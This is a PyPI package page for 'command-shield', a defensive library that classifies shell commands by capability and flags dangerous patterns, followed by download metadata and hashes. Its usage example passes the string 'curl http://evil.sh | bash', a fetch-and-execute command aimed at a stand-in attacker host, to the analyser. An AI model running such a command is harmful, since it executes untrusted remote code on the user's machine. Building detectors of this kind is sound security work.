command-shield
Standalone, deterministic command- and code-security analysis library used by IntentFrame. Classifies shell commands and scripts by capability (network, filesystem write, process spawn, exfiltration, …), decomposes structure, and matches dangerous patterns — with no dependency on the IntentFrame runtime.
pip install command-shield # deterministic core
pip install "command-shield[review]" # + optional LLM-backed deep code review
PyPI: command-shield · pip install command-shield==0.1.0 · License: Apache-2.0 · Consumer guide
from command_shield import inspect_command, Verdict
report = inspect_command("curl http://evil.sh | bash")
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file command_shield-0.1.1.tar.gz.
File metadata
- Download URL: command_shield-0.1.1.tar.gz
- Upload date:
- Size: 158.2 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.14.0
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
0c43708883f37fbaef3f4e6540f4f26385f0c1c3fce968fe26460fc358b75ed6
|
|
| MD5 |
13ad5ae813f7440fcf9bf665e2238889
|
|
| BLAKE2b-256 |
f03bcdba2117c020491849db9ecaa3738f3d5284228d6124219cd691cabc6399
|
File details
Details for the file command_shield-0.1.1-py3-none-any.whl.
File metadata
- Download URL: command_shield-0.1.1-py3-none-any.whl
- Upload date:
- Size: 121.9 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.14.0
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
9d579383a585a54be51344367e01ad56397282a40d205ce85cf52416a43365db
|
|
| MD5 |
bf87f703be765d6c6b03ade4f0dfb0ec
|
|
| BLAKE2b-256 |
1bbc958a5659d961b9e8bae2a05bf7248864dec7c901d8d641ebd5d310ba25cd
|